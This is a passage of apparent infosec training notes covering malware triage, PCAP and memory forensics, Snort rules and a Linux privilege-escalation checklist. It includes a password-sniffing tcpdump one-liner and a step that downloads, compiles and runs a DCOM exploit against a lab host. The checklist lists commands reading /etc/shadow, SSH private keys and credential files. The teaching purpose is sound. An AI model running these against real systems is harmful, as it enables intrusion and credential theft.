  1123. wget https://github.com/Yara-Rules/rules/archive/master.zip
  1124.  
  1125. unzip master.zip
  1126.  
  1127. cd ~/Desktop
  1128.  
  1129. yara rules-master/packer.yar malcode/malware.exe
  1130. -----------------------------------------------------------------------
  1131.  
  1132. Places to get more Yara rules:
  1133. ------------------------------
  1134. https://malwareconfig.com/static/yaraRules/
  1135. https://github.com/kevthehermit/YaraRules
  1136. https://github.com/VectraThreatLab/reyara
  1137.  
  1138.  
  1139.  
  1140. Yara rule sorting script:
  1141. -------------------------
  1142. https://github.com/mkayoh/yarasorter
  1143.  
  1144.  
  1145. ---------------------------Type This-----------------------------------
  1146. cd ~/Desktop/rules-master
  1147. for i in $( ls *.yar --hide=master.yar ); do echo include \"$i\";done > master.yar
  1148. cd ~/Desktop/
  1149. yara rules-master/master.yar malcode/malware.exe
  1150. -----------------------------------------------------------------------
  1151.  
  1152.  
  1153.  
  1154.  
  1155.  
  1156.  
  1157.  
  1158.  
  1159.  
  1160. Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with:
  1161. http://derekmorton.name/files/malware_12-14-12.sql.bz2
  1162.  
  1163.  
  1164. Malware Repositories:
  1165. http://malshare.com/index.php
  1166. http://www.malwareblacklist.com/
  1167. http://www.virusign.com/
  1168. http://virusshare.com/
  1169. http://www.tekdefense.com/downloads/malware-samples/
  1170.  
  1171.  
  1172.  
  1173.  
  1174. ###############################
  1175. # Creating a Malware Database #
  1176. ###############################
  1177.  
  1178. Creating a malware database (sqlite)
  1179. ---------------------------Type This-----------------------------------
  1180. sudo apt-get install -y python-simplejson python-simplejson-dbg
  1181.  
  1182.  
  1183. wget https://s3.amazonaws.com/infosecaddictsfiles/avsubmit.py
  1184. wget https://s3.amazonaws.com/infosecaddictsfiles/malware-password-is-infected.zip
  1185.  
  1186. unzip malware-password-is-infected.zip
  1187. infected
  1188.  
  1189. python avsubmit.py --init
  1190.  
  1191. python avsubmit.py -f malware.exe -e
  1192. -----------------------------------------------------------------------
  1193.  
  1194.  
  1195.  
  1196.  
  1197. Creating a malware database (mysql)
  1198. -----------------------------------
  1199. - Step 1: Installing MySQL database
  1200. - Run the following command in the terminal:
  1201. ---------------------------Type This-----------------------------------
  1202. sudo apt-get install mysql-server
  1203.  
  1204.  
  1205. - Step 2: Installing Python MySQLdb module
  1206. - Run the following command in the terminal:
  1207. ---------------------------Type This-----------------------------------
  1208. sudo apt-get build-dep python-mysqldb
  1209.  
  1210.  
  1211. sudo apt-get install python-mysqldb
  1212.  
  1213. -----------------------------------------------------------------------
  1214.  
  1215. Step 3: Logging in
  1216. Run the following command in the terminal:
  1217. ---------------------------Type This-----------------------------------
  1218. mysql -u root -p (set a password of 'malware')
  1219.  
  1220. - Then create one database by running following command:
  1221. ---------------------------Type This-----------------------------------
  1222. create database malware;
  1223.  
  1224. exit;
  1225.  
  1226. wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
  1227.  
  1228. vi mal_to_db.py (fill in database connection information)
  1229.  
  1230. python mal_to_db.py -i
  1231. -----------------------------------------------------------------------
  1232.  
  1233. ------- check it to see if the files table was created ------
  1234.  
  1235. mysql -u root -p
  1236. malware
  1237.  
  1238. show databases;
  1239.  
  1240. use malware;
  1241.  
  1242. show tables;
  1243.  
  1244. describe files;
  1245.  
  1246. exit;
  1247.  
  1248. ---------------------------------
  1249.  
  1250.  
  1251. - Now add the malicious file to the DB
  1252. ---------------------------Type This-----------------------------------
  1253. python mal_to_db.py -f malware.exe -u
  1254. -----------------------------------------------------------------------
  1255.  
  1256.  
  1257. - Now check to see if it is in the DB
  1258. ---------------------------Type This-----------------------------------
  1259. mysql -u root -p
  1260. malware
  1261.  
  1262. mysql> use malware;
  1263.  
  1264. select id,md5,sha1,sha256,time FROM files;
  1265.  
  1266. mysql> quit;
  1267. ------------------------------------------------------------------------
  1268.  
  1269.  
  1270.  
  1271.  
  1272. #################
  1273. # PCAP Analysis #
  1274. #################
  1275. ---------------------------Type This-----------------------------------
  1276. cd ~/Desktop/
  1277.  
  1278. mkdir suspiciouspcap/
  1279.  
  1280. cd suspiciouspcap/
  1281.  
  1282. wget https://s3.amazonaws.com/infosecaddictsfiles/suspicious-time.pcap
  1283.  
  1284. wget https://s3.amazonaws.com/infosecaddictsfiles/chaosreader.pl
  1285.  
  1286.  
  1287. perl chaosreader.pl suspicious-time.pcap
  1288.  
  1289. firefox index.html
  1290.  
  1291. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)"
  1292.  
  1293. cat index.text | grep -v '"' | grep -oE "([0-9]+\.){3}[0-9]+.*\)" | awk '{print $4, $5, $6}' | sort | uniq -c | sort -nr
  1294.  
  1295.  
  1296. for i in session_00[0-9]*.http.html; do srcip=`cat "$i" | grep 'http:\ ' | awk '{print $2}' | cut -d ':' -f1`; dstip=`cat "$i" | grep 'http:\ ' | awk '{print $4}' | cut -d ':' -f1`; host=`cat "$i" | grep 'Host:\ ' | sort -u | sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done | sort -u
  1297. ------------------------------------------------------------------------
  1298.  
  1299.  
  1300.  
  1301. ####################
  1302. # Intro to TCPDump #
  1303. ####################
  1304. ---------------------------Type This-----------------------------------
  1305. sudo apt-get install tcpdump
  1306.  
  1307.  
  1308.  
  1309. Basic sniffing
  1310. --------------
  1311. ---------------------------Type This-----------------------------------
  1312. sudo tcpdump -n
  1313.  
  1314.  
  1315. Now lets increase the display resolution of this packet, or get more details about it. The verbose switch comes in handy
  1316. ---------------------------Type This-----------------------------------
  1317. sudo tcpdump -v -n
  1318.  
  1319.  
  1320.  
  1321. Getting the ethernet header (link layer headers)
  1322. ------------------------------------------------
  1323. In the above examples details of the ethernet header are not printed. Use the -e option to print the ethernet header details as well.
  1324. ---------------------------Type This-----------------------------------
  1325. sudo tcpdump -vv -n -e
  1326. ------------------------------------------------------------------------
  1327.  
  1328. Sniffing a particular interface
  1329. -------------------------------
  1330. In order to sniff a particular network interface we must specify it with the -i switch. First lets get the list of available interfaces using the -D switch.
  1331. ---------------------------Type This-----------------------------------
  1332. sudo tcpdump -D
  1333. ------------------------------------------------------------------------
  1334.  
  1335. Filtering packets using expressions - Selecting protocols
  1336. ---------------------------------------------------------
  1337. ---------------------------Type This-----------------------------------
  1338. $ sudo tcpdump -n tcp
  1339. ------------------------------------------------------------------------
  1340.  
  1341. Particular host or port
  1342. -----------------------
  1343. Expressions can be used to specify source ip, destination ip, and port numbers. The next example picks up all those packets with source address 192.168.1.101
  1344. ---------------------------Type This-----------------------------------
  1345. $ sudo tcpdump -n 'src 192.168.1.101'
  1346. ------------------------------------------------------------------------
  1347.  
  1348. Next example picks up dns request packets, either those packets which originate from local machine and go to port 53 of some other machine.
  1349. ---------------------------Type This-----------------------------------
  1350. $ sudo tcpdump -n 'udp and dst port 53'
  1351. ------------------------------------------------------------------------
  1352.  
  1353. To display the FTP packets coming from 192.168.1.100 to 192.168.1.2
  1354. ---------------------------Type This-----------------------------------
  1355. $ sudo tcpdump 'src 192.168.1.100 and dst 192.168.1.2 and port ftp'
  1356. ------------------------------------------------------------------------
  1357.  
  1358. Search the network traffic using grep
  1359.  
  1360. Grep can be used along with tcpdump to search the network traffic. Here is a very simple example
  1361. ---------------------------Type This-----------------------------------
  1362. $ sudo tcpdump -n -A | grep -e 'POST'
  1363. ------------------------------------------------------------------------
  1364.  
  1365. So what is the idea behind searching packets. Well one good thing can be to sniff passwords.
  1366. Here is quick example to sniff passwords using egrep
  1367.  
  1368. ---------------------------Type This-----------------------------------
  1369. tcpdump port http or port ftp or port smtp or port imap or port pop3 -l -A | egrep -i 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user ' --color=auto --line-buffered -B20
  1370. ------------------------------------------------------------------------
  1371.  
  1372.  
  1373.  
  1374. #########
  1375. # NGrep #
  1376. #########
  1377.  
  1378. Install ngrep on Ubuntu
  1379. ---------------------------Type This-----------------------------------
  1380. $ sudo apt-get install ngrep
  1381. ------------------------------------------------------------------------
  1382.  
  1383. Search network traffic for string "User-Agent: "
  1384. ---------------------------Type This-----------------------------------
  1385. $ sudo ngrep -d eth0 "User-Agent: " tcp and port 80
  1386. ------------------------------------------------------------------------
  1387. In the above command :
  1388. a) tcp and port 80 - is the bpf filter (Berkeley Packet Filter) , that sniffs only TCP packet with port number 80
  1389. b) The d option specifies the interface to sniff. eth0 in this case.
  1390. c) "User-Agent: " is the string to search for. All packets that have that string are displayed.
  1391.  
  1392. 2. Search network packets for GET or POST requests :
  1393. ---------------------------Type This-----------------------------------
  1394. $ sudo ngrep -l -q -d eth0 "^GET |^POST " tcp and port 80
  1395. ------------------------------------------------------------------------
  1396. The l option makes the output buffered and the q option is for quiet ( Be quiet; don't output any information other than packet headers and their payloads (if relevant) ).
  1397.  
  1398. 3. ngrep without any options would simply capture all packets.
  1399. ---------------------------Type This-----------------------------------
  1400. $ sudo ngrep
  1401. ------------------------------------------------------------------------
  1402.  
  1403. Reference:
  1404. https://dl.packetstormsecurity.net/papers/general/ngreptut.txt
  1405. ---------------------------Type This-----------------------------------
  1406. $ sudo ngrep -d eth0 -n 3
  1407.  
  1408. $ sudo ngrep -d any port 25
  1409. ------------------------------------------------------------------------
  1410.  
  1411. This will let you monitor all activity crossing source or destination port 25
  1412. (SMTP).
  1413. ---------------------------Type This-----------------------------------
  1414. $ sudo ngrep -wi -d wlan0 'user|pass' port 6667
  1415.  
  1416. $ sudo ngrep -wi -d any 'user|pass' port 21
  1417. ------------------------------------------------------------------------
  1418.  
  1419.  
  1420.  
  1421.  
  1422.  
  1423. #############################
  1424. # PCAP Analysis with tshark #
  1425. #############################
  1426. ---------------------------Type This-----------------------------------
  1427. sudo tshark -i eth0 -r suspicious-time.pcap -qz io,phs
  1428.  
  1429.  
  1430. tshark -r suspicious-time.pcap | grep 'NB.*20\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
  1431.  
  1432.  
  1433. tshark -r suspicious-time.pcap | grep 'NB.*1e\>' | sed -e 's/<[^>]*>//g' | awk '{print $3,$4,$9}' | sort -u
  1434.  
  1435.  
  1436. tshark -r suspicious-time.pcap arp | grep has | awk '{print $3," -> ",$9}' | tr -d '?'
  1437.  
  1438.  
  1439. tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort | uniq
  1440.  
  1441.  
  1442. tshark -r suspicious-time.pcap -Y "browser.command==1" -Tfields -e "ip.src" -e "browser.server" | uniq
  1443.  
  1444. tshark -r suspicious-time.pcap -Tfields -e "eth.src" | sort |uniq
  1445.  
  1446. tshark -r suspicious-time.pcap -qz ip_hosts,tree
  1447.  
  1448. tshark -r suspicious-time.pcap -Y "http.request" -Tfields -e "ip.src" -e "http.user_agent" | uniq
  1449.  
  1450. tshark -r suspicious-time.pcap -Y "dns" -T fields -e "ip.src" -e "dns.flags.response" -e "dns.qry.name"
  1451.  
  1452.  
  1453. whois rapidshare.com.eyu32.ru
  1454.  
  1455. whois sploitme.com.cn
  1456.  
  1457.  
  1458. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}'
  1459.  
  1460. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' -e google -e 'honeynet.org'
  1461.  
  1462. tshark -r suspicious-time.pcap -qz http_req,tree
  1463.  
  1464. tshark -r suspicious-time.pcap -Y "data-text-lines contains \"<script\"" -T fields -e frame.number -e ip.src -e ip.dst
  1465.  
  1466. tshark -r suspicious-time.pcap -Y http.request -T fields -e ip.src -e ip.dst -e http.host -e http.request.uri | awk '{print $1," -> ",$2, "\t: ","http://"$3$4}' | grep -v -e '\/image' -e '.css' -e '.ico' | grep 10.0.3.15 | sed -e 's/\?[^cse].*/\?\.\.\./g'
  1467.  
  1468.  
  1469.  
  1470. ######################################
  1471. # PCAP Analysis with forensicPCAP.py #
  1472. ######################################
  1473. ---------------------------Type This-----------------------------------
  1474. cd ~/Desktop/suspiciouspcap/
  1475.  
  1476. wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py
  1477.  
  1478. sudo pip install cmd2==0.7.9
  1479.  
  1480.  
  1481. python forensicPCAP.py suspicious-time.pcap
  1482. ------------------------------------------------------------------------
  1483.  
  1484.  
  1485. ---------------------------Type This-----------------------------------
  1486. ForPCAP >>> help
  1487. ------------------------------------------------------------------------
  1488.  
  1489. Prints stats about PCAP
  1490. ---------------------------Type This-----------------------------------
  1491. ForPCAP >>> stat
  1492. ------------------------------------------------------------------------
  1493.  
  1494. Prints all DNS requests from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
  1495. ---------------------------Type This-----------------------------------
  1496. ForPCAP >>> dns
  1497.  
  1498. ForPCAP >>> show
  1499. ------------------------------------------------------------------------
  1500.  
  1501. Prints all destination ports from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
  1502. ---------------------------Type This-----------------------------------
  1503. ForPCAP >>> dstports
  1504.  
  1505. ForPCAP >>> show
  1506. ---------------------------Type This-----------------------------------
  1507.  
  1508. Prints the number of ip source and store them.
  1509. ---------------------------Type This-----------------------------------
  1510. ForPCAP >>> ipsrc
  1511.  
  1512. ForPCAP >>> show
  1513. ------------------------------------------------------------------------
  1514.  
  1515. Prints the number of web's requests and store them
  1516. ForPCAP >>> web
  1517.  
  1518. ForPCAP >>> show
  1519. ------------------------------------------------------------------------
  1520.  
  1521.  
  1522. Prints the number of mail's requests and store them
  1523. ---------------------------Type This-----------------------------------
  1524. ForPCAP >>> mail
  1525.  
  1526. ForPCAP >>> show
  1527. ------------------------------------------------------------------------
  1528.  
  1529.  
  1530.  
  1531.  
  1532.  
  1533. #############################
  1534. # Understanding Snort rules #
  1535. #############################
  1536. Field 1: Action - Snort can process events in 1 of 3 ways (alert, log, drop)
  1537.  
  1538. Field 2: Protocol - Snort understands a few types of traffic (tcp, udp, icmp)
  1539.  
  1540. Field 3: Source IP (can be a variable like $External_Net, or an IP, or a range)
  1541.  
  1542. Field 4: Source Port (can be a variable like $WebServer_Ports, or a port number, or a range of ports)
  1543.  
  1544. Field 5: Traffic Direction (->)
  1545.  
  1546. Field 6: Destination IP (can be a variable like $External_Net, or an IP, or a range)
  1547.  
  1548. Field 7: Destination Port (can be a variable like $WebServer_Ports, or a port number, or a range of ports)
  1549.  
  1550. Field 8: MSG - what is actually displayed on the analysts machine
  1551.  
  1552.  
  1553. Let's look at 2 simple rules
  1554. ----------------------------------------------------------------------------------
  1555. alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:”NETBIOS DCERPC ISystemActivator \
  1556. bind attempt”; flow:to_server,established; content:”|05|”; distance:0; within:1; \
  1557. content:”|0b|”; distance:1; within:1; byte_test:1,&,1,0,relative; content:”|A0 01 00 \
  1558. 00 00 00 00 00 C0 00 00 00 00 00 00 46|”; distance:29; within:16; \
  1559. reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2192; rev:1;)
  1560.  
  1561. alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:”NETBIOS SMB DCERPC ISystemActivator bind \
  1562. attempt”; flow:to_server,established; content:”|FF|SMB|25|”; nocase; offset:4; \
  1563. depth:5; content:”|26 00|”; distance:56; within:2; content:”|5c \
  1564. 00|P|00|I|00|P|00|E|00 5c 00|”; nocase; distance:5; within:12; content:”|05|”; \
  1565. distance:0; within:1; content:”|0b|”; distance:1; within:1; \
  1566. byte_test:1,&,1,0,relative; content:”|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 \
  1567. 46|”; distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; \
  1568. sid:2193; rev:1;)
  1569. ----------------------------------------------------------------------------------
  1570.  
  1571.  
  1572.  
  1573. From your Linux machine ping your Windows machine
  1574. ---------------------------Type This-----------------------------------
  1575. ping 192.168.11.1
  1576. -----------------------------------------------------------------------
  1577.  
  1578.  
  1579. Start wireshark and let's create some simple filters:
  1580.  
  1581. Filter 1:
  1582. ---------------------------Type This-----------------------------------
  1583. ip.addr==192.168.11.1
  1584. -----------------------------------------------------------------------
  1585.  
  1586. Filter 2:
  1587. ---------------------------Type This-----------------------------------
  1588. ip.addr==192.168.11.1 && icmp
  1589. -----------------------------------------------------------------------
  1590.  
  1591.  
  1592. Filter 3:
  1593. ---------------------------Type This-----------------------------------
  1594. ip.addr==192.168.11.1 && !(tcp.port==22)
  1595. -----------------------------------------------------------------------
  1596. Now stop your capture and restart it (make sure you keep the filter)
  1597.  
  1598.  
  1599.  
  1600.  
  1601. Back to your Linux machine:
  1602. [ CTRL-C ] - to stop your ping
  1603. ---------------------------Type This-----------------------------------
  1604. wget http://downloads.securityfocus.com/vulnerabilities/exploits/oc192-dcom.c
  1605.  
  1606.  
  1607. gcc -o exploit oc192-dcom.c
  1608.  
  1609. ./exploit
  1610.  
  1611.  
  1612. ./exploit -d 192.168.11.1 -t 0
  1613. -----------------------------------------------------------------------
  1614.  
  1615.  
  1616.  
  1617. Now go back to WireShark and stop the capture.
  1618.  
  1619.  
  1620.  
  1621.  
  1622. ###################
  1623. # Memory Analysis #
  1624. ###################
  1625. ---------------------------Type This-----------------------------------
  1626. cd ~/Desktop/
  1627.  
  1628. sudo apt-get install -y foremost tcpxtract
  1629.  
  1630. wget https://s3.amazonaws.com/infosecaddictsfiles/hn_forensics.vmem
  1631.  
  1632. git clone https://github.com/volatilityfoundation/volatility.git
  1633.  
  1634. cd volatility
  1635. sudo pip install distorm3
  1636. sudo python setup.py install
  1637. python vol.py -h
  1638. python vol.py pslist -f ~/Desktop/hn_forensics.vmem
  1639. python vol.py connscan -f ~/Desktop/hn_forensics.vmem
  1640. mkdir dump/
  1641. mkdir -p output/pdf/
  1642. python vol.py -f ~/Desktop/hn_forensics.vmem memdmp -p 888 -D dump/
  1643. python vol.py -f ~/Desktop/hn_forensics.vmem memdmp -p 1752 -D dump/
  1644. ***Takes a few min***
  1645. strings 1752.dmp | grep "^http://" | sort | uniq
  1646. strings 1752.dmp | grep "Ahttps://" | uniq -u
  1647. cd ..
  1648. foremost -i ~/Desktop/volatility/dump/1752.dmp -t pdf -o output/pdf/
  1649. cd ~/Desktop/volatility/output/pdf/
  1650. cat audit.txt
  1651. cd pdf
  1652. ls
  1653. grep -i javascript *.pdf
  1654.  
  1655.  
  1656.  
  1657. cd ~/Desktop/volatility/output/pdf/
  1658. wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
  1659. unzip pdf-parser_V0_6_4.zip
  1660. python pdf-parser.py -s javascript --raw pdf/00601560.pdf
  1661. python pdf-parser.py --object 11 00600328.pdf
  1662. python pdf-parser.py --object 1054 --raw --filter 00601560.pdf > malicious.js
  1663.  
  1664. cat malicious.js
  1665. -----------------------------------------------------------------------
  1666.  
  1667.  
  1668.  
  1669.  
  1670. *****Sorry - no time to cover javascript de-obfuscation today*****
  1671.  
  1672.  
  1673.  
  1674.  
  1675. ---------------------------Type This-----------------------------------
  1676. cd ~/Desktop/volatility
  1677. mkdir files2/
  1678. python vol.py -f ~/Desktop/hn_forensics.vmem dumpfiles -D files2/
  1679. python vol.py hivescan -f ~/Desktop/hn_forensics.vmem
  1680. python vol.py printkey -o 0xe1526748 -f ~/Desktop/hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon
  1681. -----------------------------------------------------------------------
  1682.  
  1683.  
  1684. ######################
  1685. ----------- ############### # Intro to Reversing # ############### -----------
  1686. ######################
  1687. Lab walk-through documents are in the zip file along with the executables that need to be reversed:
  1688. https://s3.amazonaws.com/infosecaddictsfiles/Lena151.zip
  1689.  
  1690.  
  1691.  
  1692.  
  1693.  
  1694. ##############################
  1695. # Linux For InfoSec Homework #
  1696. ##############################
  1697. In order to receive your certificate of attendance you must complete the all of the quizzes on the http://linuxsurvival.com/linux-tutorial-introduction/ website.
  1698.  
  1699.  
  1700. Submit the results via email in an MS Word document with (naming convention example: YourFirstName-YourLastName-Linux-For-InfoSec-Homework.docx)
  1701.  
  1702.  
  1703.  
  1704.  
  1705. ##############################
  1706. # Linux For InfoSe Challenge #
  1707. ##############################
  1708.  
  1709. In order to receive your certificate of proficiency you must complete all of the tasks covered in the Linux For InfoSec pastebin (http://pastebin.com/eduSfPy3).
  1710.  
  1711. Submit the results via email in an MS Word document with (naming convention example: YourFirstName-YourLastName-Linux-For-InfoSec-Challenge.docx)
  1712.  
  1713.  
  1714.  
  1715.  
  1716. IMPORTANT NOTE:
  1717. Your homework/challenge must be submitted via email to both (joe-at-strategicsec-.-com and ivana-at-strategicsec-.-com) by midnight EST.
  1718.  
  1719.  
  1720. #########################################################################
  1721. # What kind of Linux am I on and how can I find out? #
  1722. # Great reference: #
  1723. # https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ #
  1724. #########################################################################
  1725. - What’s the distribution type? What version?
  1726. -------------------------------------------
  1727. cat /etc/issue
  1728. cat /etc/*-release
  1729. cat /etc/lsb-release # Debian based
  1730. cat /etc/redhat-release # Redhat based
  1731.  
  1732.  
  1733.  
  1734. - What’s the kernel version? Is it 64-bit?
  1735. -------------------------------------------
  1736. cat /proc/version
  1737. uname -a
  1738. uname -mrs
  1739. rpm -q kernel
  1740. dmesg | grep Linux
  1741. ls /boot | grep vmlinuz-
  1742.  
  1743.  
  1744.  
  1745. - What can be learnt from the environmental variables?
  1746. ----------------------------------------------------
  1747. cat /etc/profile
  1748. cat /etc/bashrc
  1749. cat ~/.bash_profile
  1750. cat ~/.bashrc
  1751. cat ~/.bash_logout
  1752. env
  1753. set
  1754.  
  1755.  
  1756. - What services are running? Which service has which user privilege?
  1757. ------------------------------------------------------------------
  1758. ps aux
  1759. ps -ef
  1760. top
  1761. cat /etc/services
  1762.  
  1763.  
  1764. - Which service(s) are been running by root? Of these services, which are vulnerable - it’s worth a double check!
  1765. ---------------------------------------------------------------------------------------------------------------
  1766. ps aux | grep root
  1767. ps -ef | grep root
  1768.  
  1769.  
  1770.  
  1771. - What applications are installed? What version are they? Are they currently running?
  1772. ------------------------------------------------------------------------------------
  1773. ls -alh /usr/bin/
  1774. ls -alh /sbin/
  1775. dpkg -l
  1776. rpm -qa
  1777. ls -alh /var/cache/apt/archivesO
  1778. ls -alh /var/cache/yum/
  1779.  
  1780.  
  1781. - Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
  1782. ------------------------------------------------------------------------------------
  1783. cat /etc/syslog.conf
  1784. cat /etc/chttp.conf
  1785. cat /etc/lighttpd.conf
  1786. cat /etc/cups/cupsd.conf
  1787. cat /etc/inetd.conf
  1788. cat /etc/apache2/apache2.conf
  1789. cat /etc/my.conf
  1790. cat /etc/httpd/conf/httpd.conf
  1791. cat /opt/lampp/etc/httpd.conf
  1792. ls -aRl /etc/ | awk '$1 ~ /^.*r.*/'
  1793.  
  1794.  
  1795.  
  1796. - What jobs are scheduled?
  1797. ------------------------
  1798. crontab -l
  1799. ls -alh /var/spool/cron
  1800. ls -al /etc/ | grep cron
  1801. ls -al /etc/cron*
  1802. cat /etc/cron*
  1803. cat /etc/at.allow
  1804. cat /etc/at.deny
  1805. cat /etc/cron.allow
  1806. cat /etc/cron.deny
  1807. cat /etc/crontab
  1808. cat /etc/anacrontab
  1809. cat /var/spool/cron/crontabs/root
  1810.  
  1811.  
  1812. - Any plain text usernames and/or passwords?
  1813. ------------------------------------------
  1814. grep -i user [filename]
  1815. grep -i pass [filename]
  1816. grep -C 5 "password" [filename]
  1817. find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Search for Joomla passwords
  1818.  
  1819.  
  1820. - What NIC(s) does the system have? Is it connected to another network?
  1821. ---------------------------------------------------------------------
  1822. /sbin/ifconfig -a
  1823. cat /etc/network/interfaces
  1824. cat /etc/sysconfig/network
  1825.  
  1826.  
  1827. - What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
  1828. ------------------------------------------------------------------------------------------------------------------------
  1829. cat /etc/resolv.conf
  1830. cat /etc/sysconfig/network
  1831. cat /etc/networks
  1832. iptables -L
  1833. hostname
  1834. dnsdomainname
  1835.  
  1836. - What other users & hosts are communicating with the system?
  1837. -----------------------------------------------------------
  1838. lsof -i
  1839. lsof -i :80
  1840. grep 80 /etc/services
  1841. netstat -antup
  1842. netstat -antpx
  1843. netstat -tulpn
  1844. chkconfig --list
  1845. chkconfig --list | grep 3:on
  1846. last
  1847. w
  1848.  
  1849.  
  1850.  
  1851. - Whats cached? IP and/or MAC addresses
  1852. -------------------------------------
  1853. arp -e
  1854. route
  1855. /sbin/route -nee
  1856.  
  1857.  
  1858. - Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
  1859. ------------------------------------------------------------------------------------------
  1860. id
  1861. who
  1862. w
  1863. last
  1864. cat /etc/passwd | cut -d: -f1 # List of users
  1865. grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
  1866. awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
  1867. cat /etc/sudoers
  1868. sudo -l
  1869.  
  1870.  
  1871.  
  1872. - What sensitive files can be found?
  1873. ----------------------------------
  1874. cat /etc/passwd
  1875. cat /etc/group
  1876. cat /etc/shadow
  1877. ls -alh /var/mail/
  1878.  
  1879.  
  1880.  
  1881. - Anything “interesting” in the home directorie(s)? If it’s possible to access
  1882. ----------------------------------------------------------------------------
  1883. ls -ahlR /root/
  1884. ls -ahlR /home/
  1885.  
  1886.  
  1887. - Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords
  1888. ---------------------------------------------------------------------------------------------------------------------------
  1889. cat /var/apache2/config.inc
  1890. cat /var/lib/mysql/mysql/user.MYD
  1891. cat /root/anaconda-ks.cfg
  1892.  
  1893.  
  1894. - What has the user being doing? Is there any password in plain text? What have they been edting?
  1895. -----------------------------------------------------------------------------------------------
  1896. cat ~/.bash_history
  1897. cat ~/.nano_history
  1898. cat ~/.atftp_history
  1899. cat ~/.mysql_history
  1900. cat ~/.php_history
  1901.  
  1902.  
  1903.  
  1904. - What user information can be found?
  1905. -----------------------------------
  1906. cat ~/.bashrc
  1907. cat ~/.profile
  1908. cat /var/mail/root
  1909. cat /var/spool/mail/root
  1910.  
  1911.  
  1912. - Can private-key information be found?
  1913. -------------------------------------
  1914. cat ~/.ssh/authorized_keys
  1915. cat ~/.ssh/identity.pub
  1916. cat ~/.ssh/identity
  1917. cat ~/.ssh/id_rsa.pub
  1918. cat ~/.ssh/id_rsa
  1919. cat ~/.ssh/id_dsa.pub
  1920. cat ~/.ssh/id_dsa
  1921. cat /etc/ssh/ssh_config
  1922. cat /etc/ssh/sshd_config
  1923. cat /etc/ssh/ssh_host_dsa_key.pub
  1924. cat /etc/ssh/ssh_host_dsa_key
  1925. cat /etc/ssh/ssh_host_rsa_key.pub
  1926. cat /etc/ssh/ssh_host_rsa_key
  1927. cat /etc/ssh/ssh_host_key.pub
  1928. cat /etc/ssh/ssh_host_key
  1929.  
  1930.  
  1931. - Any settings/files (hidden) on website? Any settings file with database information?
  1932. ------------------------------------------------------------------------------------
  1933. ls -alhR /var/www/
  1934. ls -alhR /srv/www/htdocs/
  1935. ls -alhR /usr/local/www/apache22/data/
  1936. ls -alhR /opt/lampp/htdocs/
  1937. ls -alhR /var/www/html/
  1938.  
  1939.  
  1940. - Is there anything in the log file(s) (Could help with “Local File Includes”!)
  1941. -----------------------------------------------------------------------------
  1942. cat /etc/httpd/logs/access_log
  1943. cat /etc/httpd/logs/access.log
  1944. cat /etc/httpd/logs/error_log
  1945. cat /etc/httpd/logs/error.log
  1946. cat /var/log/apache2/access_log
  1947. cat /var/log/apache2/access.log
  1948. cat /var/log/apache2/error_log
  1949. cat /var/log/apache2/error.log
  1950. cat /var/log/apache/access_log
  1951. cat /var/log/apache/access.log
  1952. cat /var/log/auth.log
  1953. cat /var/log/chttp.log
  1954. cat /var/log/cups/error_log
  1955. cat /var/log/dpkg.log
  1956. cat /var/log/faillog
  1957. cat /var/log/httpd/access_log
  1958. cat /var/log/httpd/access.log
  1959. cat /var/log/httpd/error_log
  1960. cat /var/log/httpd/error.log
  1961. cat /var/log/lastlog
  1962. cat /var/log/lighttpd/access.log
  1963. cat /var/log/lighttpd/error.log
  1964. cat /var/log/lighttpd/lighttpd.access.log
  1965. cat /var/log/lighttpd/lighttpd.error.log
  1966. cat /var/log/messages
  1967. cat /var/log/secure
  1968. cat /var/log/syslog
  1969. cat /var/log/wtmp
  1970. cat /var/log/xferlog
  1971. cat /var/log/yum.log
  1972. cat /var/run/utmp
  1973. cat /var/webmin/miniserv.log
  1974. cat /var/www/logs/access_log
  1975. cat /var/www/logs/access.log
  1976. ls -alh /var/lib/dhcp3/
  1977. ls -alh /var/log/postgresql/
  1978. ls -alh /var/log/proftpd/
  1979. ls -alh /var/log/samba/
  1980.  
  1981. - Note: auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp
  1982.  
  1983.  
  1984.  
  1985.  
  1986.  
  1987. ########################################################################################################################################
  1988.  
  1989.  
  1990.  
  1991.  
  1992.  
  1993. ################################################
  1994. # Day 2: Preparing for the Comptia Linux+ Exam #
  1995. ################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement